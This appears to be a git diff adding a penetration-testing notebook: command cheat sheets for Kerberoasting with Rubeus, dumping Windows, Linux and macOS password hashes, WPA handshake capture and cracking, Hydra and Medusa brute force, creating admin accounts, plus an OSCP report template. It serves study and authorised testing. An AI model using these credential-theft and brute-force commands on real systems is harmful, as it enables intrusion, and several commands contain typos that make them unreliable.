new file mode 100644
index 0000000..0833644
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Rubeus.md	
@@ -0,0 +1,26 @@
+# Source
+
+- https://github.com/GhostPack/Rubeus
+
+Review the opsec notes before compiling the program in visual studio. 
+
+## ASREProasting:
+
+chek for users in the current domain:
+
+- Rubeus.exe asreproast  /format:<AS_REP_responses_format [hashcat | john]> /outfile:<output_hashes_file>
+
+## Kerberoasting:
+
+- Rubeus.exe kerberoast /outfile:<output_TGSs_file>
+
+- Rubeus.exe kerberoast /outfile:hashes.txt [/spn:"SID-VALUE"] [/user:USER] [/domain:DOMAIN] [/dc:DOMAIN_CONTROLLER] [/ou:"OU=,..."] 
+
+## Pass the key (PTK):
+
+- .\Rubeus.exe asktgt /domain:<domain_name> /user:<user_name> /rc4:<ntlm_hash> /ptt
+
+
+## Using the ticket on a Windows target: 
+
+- Rubeus.exe ptt /ticket:<ticket_kirbi_file>
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Linux.md
new file mode 100644
index 0000000..e11d78b
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Linux.md	
@@ -0,0 +1,56 @@
+# Linux Commands to run:
+
+- top
+- htop
+- ps -e
+- ps aux
+- ps aux | more
+- ps aux | less
+
+# Finding processes
+
+- pgrep <process-name>
+
+# Terminating a Process
+
+- kill
+- kill -9 PID
+- pkill processName
+- killall
+
+# Kill user tty/pts sessions in Linux
+
+## Commands
+
+- `w`: show who is logged on and what they are doing
+- `who`: show who is logged on
+- `tty`: show current users pseudo terminal
+- `ps -ft pts/1`: get process id for the pseudo terminal
+- `pkill`: signal process based on name and other attributes
+
+1. Check active users logged into the server with: `w`
+```
+ 16:53:37 up 23:46,  2 users,  load average: 0.00, 0.00, 0.00
+USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
+debian   pts/1    24.69.132.96     16:45    0.00s  0.04s  0.00s w
+debain   pts/2    24.69.132.96:S.0 16:35   16.00s  0.02s  0.02s /bin/bash
+```
+2. Get the PID (Process ID) of a connected terminal (tty) with: `ps -ft pts/1`
+```
+UID        PID  PPID  C STIME TTY          TIME CMD
+debian   28580 28102  0 16:45 pts/1    00:00:00 -bash
+debian   29081 28580  0 16:55 pts/1    00:00:00 ps -ft pts/1
+```
+3. Kill the process: `kill 28580`
+
+4. Alternatively use `pkill -t pts/1`
+
+# Tools to check for running processes: 
+
+## pspy
+ 
+Source: https://github.com/DominicBreuker/pspy/releases/
+
+- pspy --help
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Windows.md
new file mode 100644
index 0000000..bd3d89c
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Running Processes/General Notes Windows.md	
@@ -0,0 +1,11 @@
+# Check for Processes
+
+- tasklist
+- wmic process list full
+
+# In PowerShell
+- Get-Process
+- Get-Process -Name 'Notepad'
+
+List path where the process is running:
+- (Get-Process -Name 'Calculator').Path
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Linux.md
new file mode 100644
index 0000000..53cafb1
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Linux.md	
@@ -0,0 +1,7 @@
+# Linux: 
+
+- cat /etc/crontab
+- cat /etc/anacrontab
+- cat /etc/frontal
+- cat /etc/anacron
+- systemctl list-timers --all
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Windows.md
new file mode 100644
index 0000000..5ed0440
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Scheduled Jobs_Tasks/General Notes Windows.md	
@@ -0,0 +1,16 @@
+# Windows: 
+
+- schtasks
+
+## Impacket: 
+
+- python3 atexec.py Domain/Administrator:<Password>@123@172.21.0.0 systeminfo
+
+
+# Linux: 
+
+- cat /etc/crontab
+- cat /etc/anacrontab
+- cat /etc/frontal
+- cat /etc/anacron
+- systemctl list-timers --all
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Linux.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Linux.md
new file mode 100644
index 0000000..e2f8cea
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Linux.md	
@@ -0,0 +1,22 @@
+## For all Linux Distro's:
+
+- uname -a
+- cat /etc/issue
+- cat /proc/version
+
+## PowerShell 
+
+- $PSVersionTable
+
+Obtaining Systems Enviorment Variables:
+
+- Get-ChildItem -Path Env:
+
+## Debian:
+
+- dmesg | grep Linux
+
+## RedHat:
+
+- rpm -q kernel
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Windows.md
new file mode 100644
index 0000000..7f7edd4
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/System Information/General Notes Windows.md	
@@ -0,0 +1,9 @@
+# Command Line: 
+
+- systeminfo
+
+# PowerShell
+
+- Get-ComputerInfo
+- Get-ComputerInfo -Property "*version"
+- Get-ComputerInfo -Property "*version", "os*" | select WindowsCurrentVersion, WindowsVersion, OsName, OsBuildNumber, OsHotFixes, OsArchitecture | fl
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Linux_.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Linux_.md
new file mode 100644
index 0000000..3c7a65e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Linux_.md	
@@ -0,0 +1,29 @@
+## Enumerating Linux Users
+
+- cat /etc/passwd
+- less etc/passwd
+- getent passwd | awk -F: '{ print $1}'
+- cut -d: -f1 /etc/passwd
+- awk –F: ‘{ print $1}’ /etc/passwd
+- getent parrwd {1000..6000}
+
+## Enumerating Users Permissions
+
+- id
+- id -nG
+- getent group <group-name>
+
+## Enumerating Linux Groups
+
+- groups
+- less /etc/group
+- getent groups
+- getent group | awk -F: '{ print $1}'
+
+## Creating a user in linux: 
+
+- adduser afsimmons # (alt, use full path: /usr/sbin/adduser afsimmons)
+- passwd afsimmons
+- useradd -G {group-name} afsimmons
+
+- /usr/sbin/usermod -aG sudo afsimmons
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Windows.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Windows.md
new file mode 100644
index 0000000..ca735d8
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/7. Post Exploitation/Users and Groups/General Notes Windows.md	
@@ -0,0 +1,24 @@
+View your current user: 
+
+- whoami
+
+View information about the current user: 
+
+- net user afsimmons
+
+- net user afsimmons /domain (For a domain user)
+
+View Local Groups: 
+
+- net localgroup
+- net localgroup Administrators
+
+Add a new user: 
+
+- net user afsimmons enterpasswordhere /add
+
+Add a user in a localgroup:
+
+- net localgroup Administrators afsimmons
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/8. Post Exploitation Targets/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/8. Post Exploitation Targets/Target _1.md
new file mode 100644
index 0000000..f67139d
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/8. Post Exploitation Targets/Target _1.md	
@@ -0,0 +1 @@
+# This is a placeholder to contain all notes regarding the post-exploitation phase for each target you assess.
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md
new file mode 100644
index 0000000..2f697ae
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Cracking WEP_WPA_WPA 2 PSK Authetication.md	
@@ -0,0 +1,36 @@
+## Capture Handshake
+
+1. airmon-ng start wlan0
+2. airodump-ng mon0 --write capture.cap -c 11
+3. aireplay-ng --deauth 0 -a bb:bb:bb:bb:bb:bb mon0
+
+Convert pcap files for john and hashcat
+
+/usr/lib/hashcat-utils/cap2hccapx.bin input.pcap output.hccapx [filter by essid] [additional network essid:bssid]
+/usr/sbin/hccap2john
+/usr/sbin/vncpcap2john
+/usr/sbin/wpapcap2john
+
+
+## Cracking Handshake with Aircrack
+
+- aircrack-ng -w /usr/share/wordlist/fasttrack.txt 0001.cap
+
+## Cracking Handshakes with Hashcat
+
+- hashcat.exe -m 2500 capture.hccapx rockyou.txt (Dictionary Attack)
+- hashcat.exe -m 2500 -a3 capture.hccapx ?d?d?d?d?d?d?d?d (Brute-Force)
+- hashcat.exe -m 2500 -r rules/best64.rule capture.hccapx rockyou.txt (Rule-Based)
+
+## Cracking Handshakes with John The Ripper
+
+Did you run hccap2john?
+
+- john --format=wpapsk --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+- john --format=wpapsk-opencl --wordlist=/usr/share/wordlists/rockyou.txt crackmecap
+
+
+
+Other Resources: 
+
+https://github.com/lgandx/PCredz 
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Hashcat.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Hashcat.md
new file mode 100644
index 0000000..da4de42
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Hashcat.md	
@@ -0,0 +1,61 @@
+
+## BENCHMARK TEST (HASH TYPE)
+
+- hashcat -b -m #type
+
+## SHOW EXAMPLE HASH
+
+- hashcat -m #type --example-hashes
+
+## DICTIONARY ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt
+
+DICTIONARY + RULES ATTACK
+
+- hashcat -a 0 -m #type hash.txt dict.txt -r rule.txt
+
+COMBINATION ATTACK
+
+- hashcat -a 1 -m #type hash.txt dict1.txt dict2.txt
+
+## MASK ATTACK
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a
+
+HYBRID DICTIONARY + MASK
+
+- hashcat -a 6 -m #type hash.txt dict.txt ?a?a?a?a
+
+HYBRID MASK + DICTIONARY
+
+- hashcat -a 7 -m #type hash.txt ?a?a?a?a dict.txt
+
+
+## INCREMENT
+
+DEFAULT INCREMENT
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment
+
+INCREMENT MINIMUM LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a --increment-min=4
+
+INCREMENT MAX LENGTH
+
+- hashcat -a 3 -m #type hash.txt ?a?a?a?a?a?a --increment-max=5
+
+SESSION RESTORE
+
+- hashcat -a 0 -m #type --restore --session <uniq_name> hash.txt dict.txt
+
+
+## Cracking krb5ts Keys
+
+- hashcat -m 13100 --force <TGSs_file> <passwords_file>
+
+## Cracking Asrep keys
+
+- hashcat -a 0 -m 18200 <asrep_file> <password_file> 
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/John The Ripper.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/John The Ripper.md
new file mode 100644
index 0000000..b110a6e
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/John The Ripper.md	
@@ -0,0 +1,47 @@
+DICTIONARY ATTACK
+- john --format=#type --wordlist=dict.txt hash.txt
+
+BRUTEFORCE ATTACK
+- john --format=#type hash. txt
+
+MASK ATTACK
+- john --format=#type --mask=?l?l?l?l?l?l hash.txt -min-len=6
+
+INCREMENTAL ATTACK
+- john --incremental hash.txt
+
+DICTIONARY + RULES ATTACK
+- john --format=#type --wordlist=dict.t
+
+
+Other Notes:
+
+BENCHMARK TEST
+- john --test
+
+SESSION NAME
+- john hash.txt --session=example_name
+
+SESSION RESTORE
+- john --restore=example_name
+
+SHOW CRACKED RESULTS
+- john hash.txt --pot=<john potfile> --show
+
+WORDLIST GENERATION
+- john --wordlist=dict.txt --stdout --external:[filter name] > out.txt
+
+CRACKING SSH KEYS:
+
+- /usr/share/john/ssh2john.py id_rsa > hash.john
+- john --wordlist=/usr/share/wordlists/rockyou.txt hash.john
+
+CRACKING KRB5TGS KEYS
+
+- john --format=krb5tgs --wordlist=<passwords_file krb-key.txt
+
+Cracking ASREP Keys
+
+- john --format=krb5asrep --wordlist=<passwords_file asrep-key.txt
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Wordlists.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Wordlists.md
new file mode 100644
index 0000000..7f9513c
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Cracking Hashes Offline/Wordlists.md	
@@ -0,0 +1,40 @@
+## Local in Kali: 
+
+/usr/share/wordlists
+
+## Other Resources:
+
+Have I been Pwned
+
+- https://haveibeenpwned.com/Passwords
+
+Seclists: 
+
+- In Kali: apt install seclists
+- Usernames: https://github.com/danielmiessler/SecLists/tree/master/Usernames
+- Passwords: https://github.com/danielmiessler/SecLists/tree/master/Passwords
+
+Crackstation's Dictionary List: 
+
+- https://crackstation.net/crackstation-wordlist-password-cracking-dictionary.htm
+
+Rainbow Tables (Rainbow Crack):
+
+- http://project-rainbowcrack.com/table.htm
+
+Rocktastic Mega Wordlist:
+
+- https://labs.nettitude.com/tools/rocktastic/
+
+berzerk0 wordlist: 
+
+- https://www.hack3r.com/forum-topic/wikipedia-wordlist
+
+Weakpass: 
+
+- https://www.hack3r.com/forum-topic/wikipedia-wordlist
+
+Tools to make your own wordlists: 
+
+- Crunch
+- Cewl
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Identifying Hash Types.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Identifying Hash Types.md
new file mode 100644
index 0000000..81c30dd
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/1. Identifying Hash Types.md	
@@ -0,0 +1,7 @@
+In Kali: 
+
+- Hash-identifier
+
+Online: 
+
+- Hash Analyzer: https://www.tunnelsup.com/hash-analyzer/
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Cracking Hashes Online/Hydra.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Cracking Hashes Online/Hydra.md
new file mode 100644
index 0000000..f6eadaa
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Cracking Hashes Online/Hydra.md	
@@ -0,0 +1,5 @@
+- hydra -l user -P pass.txt -t 10 172.21.0.0 ssh -s 22
+
+- hydra -l users.txt -p /usr/share/wordlists/rockyou.txt -t 172.21.0.0 ssh -s 22
+
+- hydra -l admin -P ./passwordlist.txt $ip -V http-form-post '/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log In&testcookie=1:S=Location'
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Cracking Hashes Online/Medusa.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Cracking Hashes Online/Medusa.md
new file mode 100644
index 0000000..87ecf79
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Cracking Hashes Online/Medusa.md	
@@ -0,0 +1,13 @@
+- medusa -h target-ip -u [username] -P ../creds/passwords.txt -M http 
+
+- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp
+
+- medusa -H hosts.txt -U [path to username file] -P [path to password file] -M http 
+
+- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ssh -n 2222
+
+- medusa -h 172.21.0.0 -U [path to username file] -P [path to password file] -M ftp -O log.txt
+
+
+
+
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Dumping Hashes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Dumping Hashes.md
new file mode 100644
index 0000000..35a4638
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Hashes/2. Dumping Hashes.md	
@@ -0,0 +1,59 @@
+# Windows: 
+
+## Meterpreter HashDump
+
+- run post/windows/gather/hashdump
+
+## Meterpreter Mimikatz (Post Exploitation must be executed from SYSTEM privileges)
+
+- load mimikatz
+- creds_all
+
+DUMP LSA SECRETS
+- lsadump.py sys_backup.hiv sec_backup.hiv
+
+DUMP LOCAL PASSWORD HASHES
+
+- pwdump.py sys_backup.hiv sec_backup.hiv
+
+## reg.exe 
+
+- reg save HKLM\sam sam
+- reg save HKLM\system system
+
+## samdump2
+
+- samdump2 SYSTEM SAM > hashes.db
+
+## Impacket Tools: 
+
+- secretsdump.py -ntds ~/Extract/ntds.dit -system ~/Extract/SYSTEM -hashes lmhash:nthash LOCAL -outputfile ntlm-hashes
+
+If you have the NTDS.dit file and the SYSTEM hive: 
+
+- secretsdump.py -ntds /root/ntds_cracking/ntds.dit -system /root/ntds_cracking/systemhive LOCAL
+
+# Linux
+
+Requires Root Privileges
+
+- cat /etc/shadow
+
+- cp /etc/passwd and shadow
+- unshadow passwd shadow 
+
+#  OSX
+
+10.5-10.7
+
+- dscl localhost -read /Search/Users/<username>|grep GeneratedUID|cut -c15-cat
+/var/db/shadow/hash/<GUID> | cut -c169-216 > osx_hash.txt
+
+10.8-10.12
+
+- sudo defaults read /var/db/dslocal/nodes/Default/users/<username>.plist ShadowHashData|tr -dc ‘
+0-9a-f’|xxd -p -r|plutil -convert xml1 - -o -
+
+# Other Resources: 
+
+- Lsassy: https://github.com/Hackndo/lsassy
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Passwords/General Notes.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Passwords/General Notes.md
new file mode 100644
index 0000000..994fc21
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Passwords/General Notes.md	
@@ -0,0 +1 @@
+# Any passwords or hashs that you find should be documented here. Include steps on how you were able to obtain them from your target:
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Proof_Screenshots/Target _1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Proof_Screenshots/Target _1.md
new file mode 100644
index 0000000..56b7267
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Proof_Screenshots/Target _1.md	
@@ -0,0 +1 @@
+# Fill in results or other information about your targets here: 
\ No newline at end of file
diff --git a/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V1.md b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V1.md
new file mode 100644
index 0000000..72e8372
--- /dev/null
+++ b/Pentest_Template_Master_3.0/Pentest Template Master 3.0/9. High Value Information_Reporting/Reporting/OSCP Report Template V1.md	
@@ -0,0 +1,365 @@
+
+# <div align="center"> Offensive Security Lab/Exam Penetration Test Report </div>
+
+![d2550626a1c94aeebd273d43be0669c9.png](../../../_resources/d2550626a1c94aeebd273d43be0669c9.png)
+
+## <div align="center">  student@emailaddress.com Student-ID </div>
+
+###### <div align="center"> 2020-XX-XX </div>
+
+
+<div style="page-break-after: always;"></div>
+
+## Contents
+
+- 1 Offensive Security Exam Penetration Test Report
+   - 1.1 Introduction
+   - 1.2 Objective
+   - 1.3 Requirements
+- 2 High-Level Summary
+   - 2.1 Recommendations
+- 3 Methodologies
+   - 3.1 Information Gathering
+   - 3.2 Penetration
+      - 3.2.1 System IP: 192.168.x.x
+         - 3.2.1.1 Service Enumeration
+         - 3.2.1.2 Privilege Escalation
+      - 3.2.2 System IP: 192.168.x.x
+         - 3.2.2.1 Service Enumeration
+         - 3.2.2.2 Privilege Escalation
+      - 3.2.3 System IP: 192.168.x.x
+         - 3.2.3.1 Service Enumeration
+         - 3.2.3.2 Privilege Escalation
+      - 3.2.4 System IP: 192.168.x.x
+         - 3.2.4.1 Service Enumeration
+         - 3.2.4.2 Privilege Escalation
+      - 3.2.5 System IP: 192.168.x.x
+   - 3.3 Maintaining Access
+   - 3.4 House Cleaning
+- 4 Additional Items
+   - 4.1 Appendix - Proof and Local Contents:
+   - 4.2 Appendix - Metasploit/Meterpreter Usage
+
+<div style="page-break-after: always;"></div>
+
+## Introduction
+
+The Offensive Security Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security exam.
+This report will be graded from a standpoint of correctness and fullness to all aspects of the exam.
+The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.
+
+## Objective
+
+The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab/Exam network.
+The student is tasked with following methodical approach in obtaining access to the objective goals.
+This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report.
+An example page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course.
+Use the sample report as a guideline to get you through the reporting.
+
+## Requirements
+
+The student will be required to fill out this penetration testing report fully and to include the following sections:
+
+- Overall High-Level Summary and Recommendations (non-technical)
+- Methodology walkthrough and detailed outline of steps taken
+- Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable
+- Any additional items that were not included
+
+<div style="page-break-after: always;"></div>
+
+# High-Level Summary
+
+I was tasked with performing an internal penetration test towards Offensive Security Exam.
+An internal penetration test is a dedicated attack against internally connected systems.
+The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Security’s internal exam systems – the THINC.local domain.
+My overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
+
+When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Security’s network.
+When performing the attacks, I was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations.
+During the testing, I had administrative level access to multiple systems.
+All systems were successfully exploited and access granted.
+These systems as well as a brief description on how access was obtained are listed below:
+
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - Name of initial exploit
+- 192.168.xx.xx (hostname) - BOF
+
+## Recommendations
+
+I recommend patching the vulnerabilities identified during the testing to ensure that an attacker cannot exploit these systems in the future.
+One thing to remember is that these systems require frequent patching and once patched, should remain on a regular patch program to protect additional vulnerabilities that are discovered at a later date.
+
+<div style="page-break-after: always;"></div>
+
+# Methodologies
+
+I utilized a widely adopted approach to performing penetration testing that is effective in testing how well the Offensive Security Exam environments is secured.
+Below is a breakout of how I was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
+
+## Information Gathering
+
+The information gathering portion of a penetration test focuses on identifying the scope of the penetration test.
+During this penetration test, I was tasked with exploiting the exam network.
+The specific IP addresses were:
+
+**Exam Network**
+
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+- 192.168.
+
+## Penetration
+
+The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems.
+During this penetration test, I was able to successfully gain access to **X** out of the **X** systems.
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems.
+This is valuable for an attacker as it provides detailed information on potential attack vectors into a system.
+Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test.
+In some cases, some ports may not be listed.
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+#### Service Enumeration
+
+Server IP Address | Ports Open
+------------------|----------------------------------------
+192.168.x.x       | **TCP**: 80,443
+**UDP**: 1434,161
+
+**Nmap Scan Results:**
+
+*Initial Shell Vulnerability Exploited*
+
+*Additional info about where the initial shell was acquired from*
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Proof of Concept Code Here:**
+
+**Local.txt Proof Screenshot**
+
+**Local.txt Contents**
+
+#### Privilege Escalation
+
+*Additional Priv Esc info*
+
+**Vulnerability Exploited:**
+
+**Vulnerability Explanation:**
+
+**Vulnerability Fix:**
+
+**Severity:**
+
+**Exploit Code:**
+
+**Proof Screenshot Here:**
+
+**Proof.txt Contents:**
+
+<div style="page-break-after: always;"></div>
+
+### System IP: 192.168.x.x
+
+**Vulnerability Exploited: **
+
+**Proof Screenshot:**
+
+<div style="page-break-after: always;"></div>
+
+## Maintaining Access
+
+Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable.
+The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again.
+Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
+
+## House Cleaning
+
+The house cleaning portions of the assessment ensures that remnants of the penetration test are removed.
+Often fragments of tools or user accounts are left on an organization's computer which can cause security issues down the road.
+Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
+
+After collecting trophies from the exam network was completed, Alec removed all user accounts and passwords as well as the Meterpreter services installed on the system.
+Offensive Security should not have to remove any user accounts or services from the system.
